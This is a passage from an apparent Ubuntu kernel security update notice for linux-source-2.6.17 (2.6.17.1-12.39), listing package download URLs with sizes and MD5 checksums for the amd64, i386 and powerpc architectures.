http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:   279160 31ace8b9fd8a5783c00432e80ba83e9b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:   256924 6c0102de5f392c6255b42d13f36eae6c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:  1048458 e85815750204baa4e5121565a05b67e6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:  2103870 3956e33e4d012431810b6bd043175b06
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:   164430 02411ba7631f36224cc35f8e1467bcd5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    10506 7e32828a1b360eefa21a2900a1ec07f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    93362 c0689220349c25b4d18561451af090db
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    52572 91e1eaf7bc0a1a95deb1e20aa31ee356
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    39814 be7f95804371cf80449ab00ab2b09ef7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    79812 8a5c2917c8e41d88fe4988be3fdf350f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:     6336 44fad8c6ef38c0f4054a89482c23b8b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:     9374 e0be83662c3f41cd923cf04523dec121
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    62718 d582dc41e8dc6f9b4264457c40211e8d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:   138620 e8b5351aed98cdf9973ad93d132b7905
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:   115700 450d8ca2ed5957a321d6c009f3e24847
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    90612 1dc5df5c43ec890f05354ed688cdeb2e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:  1286170 5615ec4ce076886b2a0b801c97742102
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    80594 1e611e34d769a2a9311e45b3854f4640
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    13480 4d84bc980757d03a15a41394b1f9a3f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    76264 1de9fdeda144490e5950d96c8d6288a4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    36064 0e24439c0e8bc55dd9535faab3ec3b24
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:   151824 4ef6ee14338003c6bb10427c78c31214
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:    53548 374272c14cf4d906d005a3e607970e58
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_amd64.udeb
  Size/MD5:   323418 51ef4685d9324c266635c8a11ebb59ea

i386 architecture (x86 compatible Intel/AMD)

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    21210 7da843c5002c8ea327ccac6e532e8447
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    23806 1a35e88cc19994aacb7a6b717c639c4f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    43876 0f8440080102c2a8a9f5c0f79c6bcdc4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    44474 2572438a66d363fcd09cbfa20bb87a6d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   104794 3edc3cc7b75daa93b9fa2a1dd0832b4b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    49408 902b83472a56965fd23558b65848286a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:     2362 40d930bb1dd7fcdc88531537ac867601
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:     2388 35cbbb51e8258c121b3976abaf028ed3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    35308 396422cb15b83177dcc6940df3503a6e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    36728 2382993640cdc93dcecb8aa07cb9bb83
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    98292 fc5ac72df3f19c0fac45c647e64e6759
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   103506 da1c50087cc38d9e618e0abc50c177c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    38470 9cb694eacd4f35d8428806874930d804
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    39222 8f4f537c7bdf54734b573486d3793928
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    44262 f2558cf0898e04a3fea19c0e89c4ce85
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    44668 62ba6d29e30a08e397bc711c3714c81a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   172752 24357036194451f6e58fa166d5971eeb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   175190 88d8a49796dc3a7c55614825470c64ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    33750 6700b5682e3fe81736b8304b1c71189f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    34712 e7634d20ac3160d0571c2488e9ecd96f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   140556 2a6634cb2d87c0cce91f516441361147
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   143830 4cb625ed09c696bbbd7e4c8ab3e1a0de
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    51758 fc9f6eaf17a82cb10fef0e946e5e8c69
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    53182 68791aae59f996a1b63d370455564243
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   131598 c83d5b2c8672d64225664c0dfa59bf05
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   139174 7e4ca011696d4606795423eaef77a801
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   288316 5ad389052046deb622f8a4ecc06acc1e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   290684 7a44cec77a36726791bd95cc9c3d61da
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   103540 84f9dd4e0da64b60d505ff32213de564
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   106734 30e33868fef929c1ae9ada34a904612a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:  1737886 bb16ec7525631c14034ab29a062ef924
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:  1803410 fa07a7b1af1f688576600e39a77d118b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-386_2.6.17.1-12.39_i386.deb
  Size/MD5:   912538 58e42b87cdb686e3b1a001a5c9d00266
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.39_i386.deb
  Size/MD5:   917330 2a79321df3ffa0421730b1d13fdcb2e0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server-bigiron_2.6.17.1-12.39_i386.deb
  Size/MD5:   921050 cd0b834735573718dc588e33771fc69e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.39_i386.deb
  Size/MD5:   917220 00bf54643d92b3126916e1389b62b9a8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.39_i386.deb
  Size/MD5:  7424710 152c4c37eeea537c091d3fbaa6ff1a19
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-386_2.6.17.1-12.39_i386.deb
  Size/MD5: 22850908 896bff490260d2a0a2d1c63587573776
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.39_i386.deb
  Size/MD5: 22987088 7532ee46289f43572de6af13d76c8122
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server-bigiron_2.6.17.1-12.39_i386.deb
  Size/MD5: 23794716 399fc0c6f4d45108ad848dee3aeb8526
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.39_i386.deb
  Size/MD5: 23294984 54c7e00442278882a2b5a27a9fc8a4e1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-386_2.6.17.1-12.39_i386.deb
  Size/MD5:  1961664 54e96b54c3d01492e0defd53212da69c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.39_i386.deb
  Size/MD5:  2029428 dc8fd23f7eacf60b79458d980c0be8ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server-bigiron_2.6.17.1-12.39_i386.deb
  Size/MD5:  2067220 8d62edb94a89bb94b9c3ae0c678afdfe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.39_i386.deb
  Size/MD5:  2029160 deca25a0d751c2907ec756efed4e818f
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.17/linux-image-kdump_2.6.17.1-12.39_i386.deb
  Size/MD5: 21530894 3b57d3f94af90d5f1c1a3cc26910922b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.39_i386.deb
  Size/MD5:  1771222 71c763e96fa18da947dc6eee6273f996
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    15370 10cfc18907f69359d1bdbf2f78d26d08
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    15736 35362bfbf692db23fa6ce4701fec17f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   253308 26b726d039e835abbd7b1b7f2505b15b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   263850 5dab11c3c728f078b7af1a07db1bee55
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   220370 f17526b4a1d385552171a60962087c12
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   227608 d7e47e9512916d938c43e591b43b0ace
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:  1048352 6c6c9c78e73ec9f7971fe63cf49b8c16
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:  1048472 d07c2b1c54c9edac2e5a975832e1276b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:  2092200 94b08a57d9befd744d4a7dd984c46832
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:  2142860 1823a89cdaa80f133c3042ef6027906d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   156874 8252c3c9f39252cee290205f86f3eac5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   152152 3445e3338b9c17bcb43bb4a910f56948
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:     9180 b266fb5d5b4f747c79c34543d2edcbde
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:     9658 e855025e195c2f8f173fae055a249a3f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    79224 b9faa2fe32fb6615b36cb5d771d195fb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    81764 22a1775183f30e2af51c6422d7b0ffd7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    55084 f8b386e3cf4128da93fdc168172b931d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    56734 4642732b2d53ec2974622eab1be5b036
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    34484 ae3b8321a6c2e72ce1d73aaeb51a290b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    35412 5a130ce6dd2a832191ecb3c06a936fda
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    85866 9a4364e45eb252c42c8467b5aac3238f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    87432 b52be9db245f990905b0d9ebc6dd57c7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:     6084 dcf193961a372c692a2eae91b3f632f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:     6096 99a48360f55afe690f9473e34b6f1799
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:     8608 9ec3749db2fb4fe85b772cb565ad04ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:     8902 5cf288f11f076cf4493acb3462185a19
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    52684 b9d4b121f3ae3f4e9a59e8ef6db2cdb6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    55112 72dba23de6f18debf662694afd1c86ca
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   129982 3cf698040f21e94ef38da5245d398564
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   132968 6da10555d56c7a4e80b59b90af9829ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    99866 7f593b5372383a266557d38d6ef879d8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   101174 3b572152c1463d1515c31a73f990d2a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    79568 d5b9488f8e66089a93368f970d7c9aea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    80934 ba31c0d5c7ee98e076e9e3044dd8dac3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:  1394930 8f0491b599a89d26ae8fdda93cf47535
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:  1398114 9f7edf4e56a5a5363458792fbe1832e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    69148 7be68924e4c4e55ffc329ba1b30e7482
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    71082 3e9618027770b0bcc5ad955e3809081c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    11422 450542ce7fbcd5144c8ee376fc9d38ec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    11980 f2779c8454730ccb72358ccca660e0d6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    62478 51c02138465bcc89c68c9701b275c5dd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    63808 eeaf8f81dfe946df62111a7ea8cbdc9e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    36008 ef4b454375feece71b44259e2a20d752
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    36522 194f8344fe8660a789069cfbb99b4369
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   127288 4eb7f58f56d296423a57d6f7a562bf96
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   131320 cca3b2c3fcb5bc7f991af37e1a7f7a1d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    46806 9f859879ca4e693a42f4da083661ba0c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:    47566 6fc3e9a1e7766bbca3bc5489258d56e4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-386-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   311902 3f6da4553365c0d510f4556510396b72
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.39_i386.udeb
  Size/MD5:   318658 d5c418b0d20538a0cd7aafb8ec1aa0b2

powerpc architecture (Apple Macintosh G3/G4/G5)

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    23240 66f5bf514de994d84915d882d5a611f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    26082 6be2f4d3f90adba4e6d98973677b2190
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    48586 53fd8c1845bfdcbb7e5e29b107a276c0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    52034 603d87b3bbd90eba2f634ab2a9618972
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:     2320 e219fa60c226159fc90d6df2804347f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:     2514 e1a6b95c138f84b6a50230c459e371eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    39142 8a31b03d64d142dc174f29ddfd6469e8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    43164 c6812e8fc74cc275abbf1ad8923cd95f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   111464 7687c500326dd4c20331762277160582
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   122272 b554f0b20dcd0ebfce5ca985dd15a52e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    40406 f65f76d5ff504a1e7126489858150a81
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    46878 9c14a66ff520fb173f2ec3541627f65b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    28064 8c8f4414d68106d96c0cb147375beac4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:    29046 7528aa197e90533bc51c5a2faac3188d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.39_powerpc.udeb
  Size/MD5:   209724 a8697532cb81b2eb1601bcb57f398109
